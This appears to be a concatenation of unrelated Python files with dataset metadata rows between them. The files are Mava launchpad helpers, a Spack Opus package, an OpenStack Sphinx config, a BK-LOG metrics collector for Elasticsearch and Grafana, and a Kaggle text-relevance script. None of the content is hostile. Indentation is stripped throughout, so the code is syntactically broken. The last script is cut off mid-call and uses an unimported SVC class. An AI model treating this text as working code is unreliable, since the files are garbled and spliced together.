"""Utility function for building and launching launchpad programs."""
import functools
import inspect
from typing import Any, Callable, Dict, List, Optional
import launchpad as lp
from absl import flags, logging
from acme.utils import counting
from launchpad.nodes.python.local_multi_processing import PythonProcess
from mava.utils.training_utils import non_blocking_sleep
FLAGS = flags.FLAGS
def to_device(program_nodes: List, nodes_on_gpu: List = ["trainer"]) -> Dict:
"""Specifies which nodes should run on gpu.
If nodes_on_gpu is an empty list, this returns a cpu only config.
Args:
program_nodes (List): nodes in lp program.
nodes_on_gpu (List, optional): nodes to run on gpu. Defaults to ["trainer"].
Returns:
Dict: dict with cpu only lp config.
"""
return {
node: PythonProcess(env={"CUDA_VISIBLE_DEVICES": str(-1)})
if (node not in nodes_on_gpu)
else []
for node in program_nodes
}
def partial_kwargs(function: Callable[..., Any], **kwargs: Any) -> Callable[..., Any]:
"""Return a partial function application by overriding default keywords.
This function is equivalent to `functools.partial(function, **kwargs)` but
will raise a `ValueError` when called if either the given keyword arguments
are not defined by `function` or if they do not have defaults.
This is useful as a way to define a factory function with default parameters
and then to override them in a safe way.
Args:
function: the base function before partial application.
**kwargs: keyword argument overrides.
Returns:
A function.
"""
# Try to get the argspec of our function which we'll use to get which keywords
# have defaults.
argspec = inspect.getfullargspec(function)
# Figure out which keywords have defaults.
if argspec.defaults is None:
defaults = []
else:
defaults = argspec.args[-len(argspec.defaults) :]
# Find any keys not given as defaults by the function.
unknown_kwargs = set(kwargs.keys()).difference(defaults)
# Raise an error
if unknown_kwargs:
error_string = "Cannot override unknown or non-default kwargs: {}"
raise ValueError(error_string.format(", ".join(unknown_kwargs)))
return functools.partial(function, **kwargs)
class StepsLimiter:
"""Process that terminates an experiment when `max_steps` is reached."""
def __init__(
self,
counter: counting.Counter,
max_steps: Optional[int],
steps_key: str = "executor_steps",
):
self._counter = counter
self._max_steps = max_steps
self._steps_key = steps_key
def run(self) -> None:
"""Run steps limiter to terminate an experiment when max_steps is reached."""
logging.info(
"StepsLimiter: Starting with max_steps = %d (%s)",
self._max_steps,
self._steps_key,
)
while True:
# Update the counts.
counts = self._counter.get_counts()
num_steps = counts.get(self._steps_key, 0)
logging.info("StepsLimiter: Reached %d recorded steps", num_steps)
if num_steps > self._max_steps:
logging.info(
"StepsLimiter: Max steps of %d was reached, terminating",
self._max_steps,
)
lp.stop()
# Don't spam the counter.
non_blocking_sleep(10)
| 33.225806 | 86 | 0.667233 |
0300847923582421da826aab2c40f33b1c944e7a | 1,714 | py | Python | var/spack/repos/builtin/packages/opus/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2018-11-27T03:39:44.000Z | 2021-09-06T15:50:35.000Z | var/spack/repos/builtin/packages/opus/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | var/spack/repos/builtin/packages/opus/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-10-14T14:20:17.000Z | 2020-10-14T14:20:17.000Z | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Opus(AutotoolsPackage):
"""Opus is a totally open, royalty-free, highly versatile audio codec."""
homepage = "http://opus-codec.org/"
url = "http://downloads.xiph.org/releases/opus/opus-1.1.4.tar.gz"
version('1.1.4', 'a2c09d995d0885665ff83b5df2505a5f')
version('1.1.3', '32bbb6b557fe1b6066adc0ae1f08b629')
version('1.1.2', '1f08a661bc72930187893a07f3741a91')
version('1.1.1', 'cfb354d4c65217ca32a762f8ab15f2ac')
version('1.1', 'c5a8cf7c0b066759542bc4ca46817ac6')
version('1.0.3', '86eedbd3c5a0171d2437850435e6edff')
version('1.0.2', 'c503ad05a59ddb44deab96204401be03')
version('1.0.1', 'bbac19996957b404a1139816e2f357f5')
version('1.0.0', 'ec3ff0a16d9ad8c31a8856d13d97b155')
version('0.9.14', 'c7161b247a8437ae6b0f11dd872e69e8')
version('0.9.10', 'afbda2fd20dc08e6075db0f60297a137')
version('0.9.9', '0c18f0aac37f1ed955f5d694ddd88000')
version('0.9.8', '76c1876eae9169dee808ff4710d847cf')
version('0.9.7', '49834324ab618105cf112e161770b422')
version('0.9.6', '030556bcaebb241505f8577e92abe6d4')
version('0.9.5', '6bec090fd28996da0336e165b153ebd8')
version('0.9.3', '934226d4f572d01c5848bd70538248f5')
version('0.9.2', '8b9047956c4a781e05d3ac8565cd28f5')
version('0.9.1', 'f58214e530928aa3db1dec217d5dfcd4')
version('0.9.0', '8a729db587430392e64280a499e9d061')
depends_on('libvorbis')
| 46.324324 | 77 | 0.687865 |
e4416677b9f1141184c6eca201978aacd9cf5679 | 7,447 | py | Python | doc/source/conf.py | openstack/i18n | 315da907d845f4d582a448351b1678ee2bb23ad1 | [
"Apache-2.0"
] | 19 | 2015-11-09T21:46:40.000Z | 2021-02-01T15:16:36.000Z | doc/source/conf.py | openstack/i18n | 315da907d845f4d582a448351b1678ee2bb23ad1 | [
"Apache-2.0"
] | 4 | 2016-08-04T15:35:57.000Z | 2021-09-24T06:32:43.000Z | doc/source/conf.py | openstack/i18n | 315da907d845f4d582a448351b1678ee2bb23ad1 | [
"Apache-2.0"
] | 4 | 2016-08-04T13:36:59.000Z | 2019-08-05T11:28:31.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['openstackdocstheme']
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/i18n'
openstackdocs_pdf_link = True
openstackdocs_bug_project = 'openstack-i18n'
openstackdocs_bug_tag = 'doc'
openstackdocs_auto_name = False
openstackdocs_auto_version = False
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'I18n Contributor Guide'
copyright = u'2015, OpenStack contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = []
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# So that we can enable "log-a-bug" links from each output HTML page, this
# variable must be set to a format that includes year, month, day, hours and
# minutes.
# html_last_updated_fmt = '%Y-%m-%d %H:%M'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# This one is needed for "Report a bug".
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'i18n-contributor-guide'
# If true, publish source files
html_copy_source = False
# -- Options for LaTeX output -------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'doc-i18n.tex', u'Internationalization Documentation',
u'OpenStack Foundation', 'howto'),
]
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| 34.004566 | 79 | 0.728347 |
75cbeb9bee7984d77b9ee71aeefbbfcdb056f126 | 23,662 | py | Python | apps/log_measure/handlers/metrics.py | qqqqqie/bk-log | 1765f1901aafaa6fb6a57b8db5d35dd32b3cb5c1 | [
"MIT"
] | null | null | null | apps/log_measure/handlers/metrics.py | qqqqqie/bk-log | 1765f1901aafaa6fb6a57b8db5d35dd32b3cb5c1 | [
"MIT"
] | null | null | null | apps/log_measure/handlers/metrics.py | qqqqqie/bk-log | 1765f1901aafaa6fb6a57b8db5d35dd32b3cb5c1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import, unicode_literals
import socket
import time
from collections import defaultdict
from functools import wraps
import arrow
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.db.models import Count
from django.utils.translation import ugettext as _
from elasticsearch import Elasticsearch
from apps.api import TransferApi, NodeApi, CCApi
from apps.utils.log import logger
from apps.log_databus.constants import STORAGE_CLUSTER_TYPE
from apps.log_databus.models import CollectorConfig
from apps.log_measure.exceptions import EsConnectFailException
from apps.log_search.models import UserIndexSetSearchHistory, LogIndexSet, ProjectInfo
from bk_dataview.grafana import client as grafana_client
class Metric(object):
"""
指标定义
"""
def __init__(self, metric_name, metric_value, dimensions=None):
self.metric_name = metric_name
self.metric_value = metric_value
self.dimensions = dimensions
def to_prometheus_text(self, namespace=None, timestamp=""):
if namespace:
actual_metric_name = "{}_{}".format(namespace, self.metric_name)
else:
actual_metric_name = self.metric_name
if self.dimensions:
dimensions = ",".join('{}="{}"'.format(key, value) for key, value in self.dimensions.items())
dimensions = "{" + dimensions + "}"
else:
dimensions = ""
prometheus_text = "{metric_name}{dimensions} {metric_value} {timestamp}".format(
metric_name=actual_metric_name,
dimensions=dimensions,
metric_value=self.metric_value,
timestamp=timestamp * 1000,
)
return prometheus_text
def register_metric(namespace, description="", cache_time=0):
def wrapped_view(func):
def _wrapped_view(*args, **kwargs):
cache_key = f"statistics_{namespace}"
if cache_time:
result = cache.get(cache_key)
if result:
return result
result = func(*args, **kwargs)
if cache_time:
cache.set(cache_key, result, cache_time)
return result
_wrapped_view.namespace = namespace
_wrapped_view.description = description
_wrapped_view.is_metric = True
return wraps(func)(_wrapped_view)
return wrapped_view
class BaseMetricCollector(object):
def __init__(self, collect_interval=300):
# 业务缓存
biz_list = CCApi.get_app_list({"fields": ["bk_biz_id", "bk_biz_name"], "no_request": True}).get("info", [])
self.biz_info = {int(business["bk_biz_id"]): business for business in biz_list}
self.project_biz_info = {}
for project in ProjectInfo.objects.all():
self.project_biz_info[project.project_id] = self.biz_info.get(project.bk_biz_id)
# 上报时间
self.collect_interval = collect_interval
timestamp = arrow.now().timestamp
self.report_ts = timestamp // self.collect_interval * self.collect_interval
@property
def time_range(self):
# 取整
return arrow.get(self.report_ts - self.collect_interval).datetime, arrow.get(self.report_ts).datetime
def get_biz_name(self, bk_biz_id):
"""
根据业务ID获取业务名称
"""
return self.biz_info[int(bk_biz_id)]["bk_biz_name"] if int(bk_biz_id) in self.biz_info else bk_biz_id
def collect(self, namespaces=None, response_format="prometheus"):
"""
采集入口
"""
metric_methods = self.list_metric_methods(namespaces)
metric_groups = []
for metric_method in metric_methods:
try:
begin_time = time.time()
metric_groups.append(
{
"namespace": metric_method.namespace,
"description": metric_method.description,
"metrics": metric_method(),
}
)
logger.info(
"[statistics_data] collect metric->[{}] took {} ms".format(
metric_method.namespace, int((time.time() - begin_time) * 1000)
),
)
except Exception as e: # pylint: disable=broad-except
logger.exception("[statistics_data] collect metric->[{}] failed: {}".format(metric_method.namespace, e))
if response_format != "prometheus":
return metric_groups
metric_text_list = []
# 转换为prometheus格式
for group in metric_groups:
metric_text_list.append("# {}".format(group["description"] or group["namespace"]))
for metric in group["metrics"]:
metric_text_list.append(
metric.to_prometheus_text(namespace=group["namespace"], timestamp=self.report_ts)
)
return "\n".join(metric_text_list)
@property
def registered_metrics(self):
return [
method
for method in dir(self)
if method != "registered_metrics"
and callable(getattr(self, method))
and getattr(getattr(self, method), "is_metric", None)
]
def list_metric_methods(self, namespaces=None):
"""
获取
:param namespaces:
:return:
"""
namespaces = namespaces or []
if isinstance(namespaces, str):
namespaces = [namespaces]
methods = []
for metric in self.registered_metrics:
method = getattr(self, metric)
if not namespaces:
methods.append(method)
for namespace in namespaces:
if method.namespace.startswith(namespace):
methods.append(method)
return methods
@classmethod
def append_total_metric(cls, metrics):
total = sum(metric.metric_value for metric in metrics)
metrics.append(
Metric(
metric_name="total",
metric_value=total,
)
)
return metrics
class MetricCollector(BaseMetricCollector):
def __init__(self, *args, **kwargs):
super(MetricCollector, self).__init__(*args, **kwargs)
self.cluster_infos = {
cluster_info["cluster_config"]["cluster_id"]: cluster_info for cluster_info in self.list_cluster_info()
}
self._cluster_clients = {}
@staticmethod
def list_cluster_info(cluster_id=None):
"""
获取集群列表
"""
params = {"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True}
if cluster_id:
params.update({"cluster_id": cluster_id})
return TransferApi.get_cluster_info(params)
def get_es_client_by_id(self, cluster_id):
"""
根据集群ID获取ES客户端
"""
cluster_info = self.cluster_infos.get(cluster_id)
if not cluster_info:
return None
return self.get_es_client(cluster_info)
def get_es_client(self, cluster_info):
"""
根据集群信息获取ES客户端
"""
cluster_id = cluster_info["cluster_config"]["cluster_id"]
if cluster_id in self._cluster_clients:
return self._cluster_clients[cluster_id]
self._cluster_clients[cluster_id] = None
cluster_config = cluster_info["cluster_config"]
domain_name = cluster_config["domain_name"]
port = cluster_config["port"]
auth_info = cluster_info.get("auth_info", {})
username = auth_info.get("username")
password = auth_info.get("password")
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
es_address: tuple = (str(domain_name), int(port))
cs.settimeout(2)
status: int = cs.connect_ex(es_address)
if status != 0:
raise EsConnectFailException()
cs.close()
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
hosts=[domain_name],
http_auth=http_auth,
scheme="http",
port=port,
verify_certs=False,
timeout=10,
)
if not es_client.ping(params={"request_timeout": 10}):
raise EsConnectFailException()
self._cluster_clients[cluster_id] = es_client
return es_client
@register_metric("business_active", _("活跃业务"))
def business_active(self):
# 一个星期内检索过日志的,才被认为是活跃业务
history_ids = UserIndexSetSearchHistory.objects.filter(
created_at__gte=arrow.now().replace(days=-7).datetime
).values_list("index_set_id", flat=True)
project_ids = set(
LogIndexSet.objects.filter(index_set_id__in=set(history_ids)).values_list("project_id", flat=True)
)
metrics = [
Metric(
metric_name="count",
metric_value=1,
dimensions={
"target_biz_id": self.project_biz_info[project_id]["bk_biz_id"],
"target_biz_name": self.project_biz_info[project_id]["bk_biz_name"],
},
)
for project_id in project_ids
if self.project_biz_info.get(project_id)
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("user_active", _("活跃用户"))
def user_active(self):
user_model = get_user_model()
recent_login_users = user_model.objects.filter(last_login__gte=self.time_range[0])
metrics = [
Metric(metric_name="count", metric_value=1, dimensions={"username": user.username})
for user in recent_login_users
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_config", _("采集配置"))
def collector_config(self):
groups = (
CollectorConfig.objects.filter(is_active=True)
.values("bk_biz_id")
.order_by()
.annotate(count=Count("collector_config_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_host", _("采集主机"), cache_time=60 * 60)
def collect_host(self):
configs = CollectorConfig.objects.filter(is_active=True).values(
"bk_biz_id", "subscription_id", "category_id", "collector_config_id"
)
biz_mapping = {
config["subscription_id"]: {
"bk_biz_id": config["bk_biz_id"],
"category_id": config["category_id"],
"collector_config_id": config["collector_config_id"],
}
for config in configs
if config["subscription_id"]
}
groups = NodeApi.get_subscription_instance_status(
{"subscription_id_list": list(biz_mapping.keys()), "no_request": True}
)
metrics = [
Metric(
metric_name="count",
metric_value=len(group["instances"]),
dimensions={
"target_biz_id": biz_mapping[group["subscription_id"]]["bk_biz_id"],
"target_biz_name": self.get_biz_name(biz_mapping[group["subscription_id"]]["bk_biz_id"]),
"category_id": biz_mapping[group["subscription_id"]]["category_id"],
"collector_config_id": biz_mapping[group["subscription_id"]]["collector_config_id"],
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("index_set", _("索引集"))
def index_set(self):
groups = (
LogIndexSet.objects.values("project_id", "scenario_id").order_by().annotate(count=Count("index_set_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": self.project_biz_info[group["project_id"]]["bk_biz_id"],
"target_biz_name": self.project_biz_info[group["project_id"]]["bk_biz_name"],
"scenario_id": group["scenario_id"],
},
)
for group in groups
if self.project_biz_info.get(group["project_id"])
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("third_party_es", _("第三方ES"))
def third_party_es(self):
clusters = TransferApi.get_cluster_info({"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True})
groups = defaultdict(int)
for cluster in clusters:
if cluster["cluster_config"]["registered_system"] == "_default":
continue
bk_biz_id = cluster["cluster_config"]["custom_option"]["bk_biz_id"]
if not bk_biz_id:
continue
groups[bk_biz_id] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in groups.items()
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("cluster_health", _("集群健康度"))
def cluster_health(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
health_data = es_client.cluster.health(params={"request_timeout": 10})
dimensions = {
"origin_cluster_name": health_data["cluster_name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in [
"number_of_nodes",
"number_of_data_nodes",
"active_primary_shards",
"active_shards",
"relocating_shards",
"initializing_shards",
"unassigned_shards",
"delayed_unassigned_shards",
"number_of_pending_tasks",
"number_of_in_flight_fetch",
"task_max_waiting_in_queue_millis",
"active_shards_percent_as_number",
]:
if key not in health_data:
continue
metrics.append(
Metric(
metric_name=key,
metric_value=health_data[key],
dimensions=dimensions,
)
)
# 状态字段需要单独处理
status_mapping = {
"green": 0,
"yellow": 1,
"red": 2,
}
metrics.append(
Metric(
metric_name="status",
metric_value=status_mapping[health_data["status"]],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_health metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("cluster_node", _("集群节点"))
def cluster_node(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
allocations = es_client.cat.allocation(format="json", bytes="mb", params={"request_timeout": 10})
for allocation in allocations:
if allocation["node"] == "UNASSIGNED":
# 未分配的节点忽略
continue
dimensions = {
"node_ip": allocation["ip"],
"node": allocation["node"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["shards", "disk.indices", "disk.used", "disk.avail", "disk.total", "disk.percent"]:
if key not in allocation:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=allocation[key],
dimensions=dimensions,
)
)
nodes = es_client.cat.nodes(format="json", params={"request_timeout": 10})
for node in nodes:
dimensions = {
"node_ip": node["ip"],
"node": node["name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["heap.percent", "ram.percent", "cpu", "load_1m", "load_5m", "load_15m"]:
if key not in node:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=node[key],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_node metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("grafana_dashboard", _("Grafana 仪表盘"), cache_time=60 * 60)
def grafana_dashboard(self):
metrics = []
all_organization = grafana_client.get_all_organization().json()
for org in all_organization:
org_name = org["name"]
if not org_name.isdigit():
continue
if int(org_name) not in self.biz_info:
continue
dashboards = grafana_client.search_dashboard(org_id=org["id"]).json()
metrics.append(
Metric(
metric_name="count",
metric_value=len(dashboards),
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
panel_count = 0
for dashboard in dashboards:
dashboard_info = (
grafana_client.get_dashboard_by_uid(org_id=org["id"], dashboard_uid=dashboard["uid"])
.json()
.get("dashboard", {})
)
for panel in dashboard_info.get("panels", []):
if panel["type"] == "row":
# 如果是行类型,需要统计嵌套数量
panel_count += len(panel.get("panels", []))
else:
panel_count += 1
metrics.append(
Metric(
metric_name="panel_count",
metric_value=panel_count,
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
return metrics
@register_metric("log_extract_strategy", _("日志提取策略"))
def log_extract_strategy(self):
from apps.log_extract.models import Strategies
groups = Strategies.objects.all().values("bk_biz_id").order_by().annotate(count=Count("strategy_id"))
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("log_extract_task", _("日志提取任务"))
def log_extract_task(self):
from apps.log_extract.models import Tasks
groups = Tasks.objects.all().values("bk_biz_id", "created_by").order_by().annotate(count=Count("task_id"))
# 每个业务的任务数
biz_count_groups = defaultdict(int)
# 每个业务的用户数
user_count_groups = defaultdict(int)
for group in groups:
biz_count_groups[group["bk_biz_id"]] += group["count"]
user_count_groups[group["bk_biz_id"]] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in biz_count_groups.items()
]
metrics = self.append_total_metric(metrics)
metrics += [
Metric(
metric_name="user_count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in user_count_groups.items()
]
return metrics
| 36.856698 | 120 | 0.561237 |
20003b44d4a56c655dc208fa8e485b7423255354 | 3,621 | py | Python | Search_result/srr5.py | tanayz/Kaggle | 0dabcf5ccc2432cecd12f91fba9dfda64dc1afdd | [
"Apache-2.0"
] | null | null | null | Search_result/srr5.py | tanayz/Kaggle | 0dabcf5ccc2432cecd12f91fba9dfda64dc1afdd | [
"Apache-2.0"
] | null | null | null | Search_result/srr5.py | tanayz/Kaggle | 0dabcf5ccc2432cecd12f91fba9dfda64dc1afdd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 2 17:39:57 2015
@author: tanay
"""
from sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier
from sklearn import pipeline, metrics, grid_search
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.preprocessing import StandardScaler
import pandas as pd
#from sklearn.linear_model import LogisticRegression
from sklearn import pipeline#, metrics, grid_search,decomposition,
from nltk.stem.porter import PorterStemmer
import re
from bs4 import BeautifulSoup
import string
from sklearn.feature_extraction import text
# array declarations
sw=[]
s_data = []
s_labels = []
t_data = []
t_labels = []
stemmer = PorterStemmer()
#stopwords tweak - more overhead
stop_words = ['http','www','img','border','color','style','padding','table','font','thi','inch','ha','width','height',
'0','1','2','3','4','5','6','7','8','9']
#stop_words = text.ENGLISH_STOP_WORDS.union(stop_words)
#stop_words = ['http','www','img','border','0','1','2','3','4','5','6','7','8','9']
stop_words = text.ENGLISH_STOP_WORDS.union(stop_words)
punct = string.punctuation
punct_re = re.compile('[{}]'.format(re.escape(punct)))
#remove html, remove non text or numeric, make query and title unique features for counts using prefix (accounted for in stopwords tweak)
stemmer = PorterStemmer()
train = pd.read_csv("../input/train.csv").fillna("")
test = pd.read_csv("../input/test.csv").fillna("")
for i in range(len(train.id)):
s=(" ").join(["q"+ z for z in BeautifulSoup(train["query"][i]).get_text(" ").split(" ")]) + " " + (" ").join(["z"+ z for z in BeautifulSoup(train.product_title[i]).get_text(" ").split(" ")]) + " " + BeautifulSoup(train.product_description[i]).get_text(" ")
s=re.sub("[^a-zA-Z0-9]"," ", s)
s= (" ").join([stemmer.stem(z) for z in s.split(" ")])
s_data.append(s)
s_labels.append(str(train["median_relevance"][i]))
for i in range(len(test.id)):
s=(" ").join(["q"+ z for z in BeautifulSoup(test["query"][i]).get_text().split(" ")]) + " " + (" ").join(["z"+ z for z in BeautifulSoup(test.product_title[i]).get_text().split(" ")]) + " " + BeautifulSoup(test.product_description[i]).get_text()
s=re.sub("[^a-zA-Z0-9]"," ", s)
s= (" ").join([stemmer.stem(z) for z in s.split(" ")])
t_data.append(s)
clf = pipeline.Pipeline([('v',TfidfVectorizer(min_df=5, max_df=500, max_features=None, strip_accents='unicode', analyzer='word', token_pattern=r'\w{1,}', ngram_range=(1, 2), use_idf=True, smooth_idf=True, sublinear_tf=True, stop_words = 'english')),
('svd', TruncatedSVD(n_components=300, algorithm='randomized', n_iter=5, random_state=None, tol=0.0)),
('scl', StandardScaler(copy=True, with_mean=True, with_std=True)),
('svc', SVC(C=10))])
param_grid = {'svc__C': [10],'svc__gamma': [0,0.001,0.0001,0.00001],'svd__n_components': [300]}
model = grid_search.GridSearchCV(estimator = clf, param_grid=param_grid,
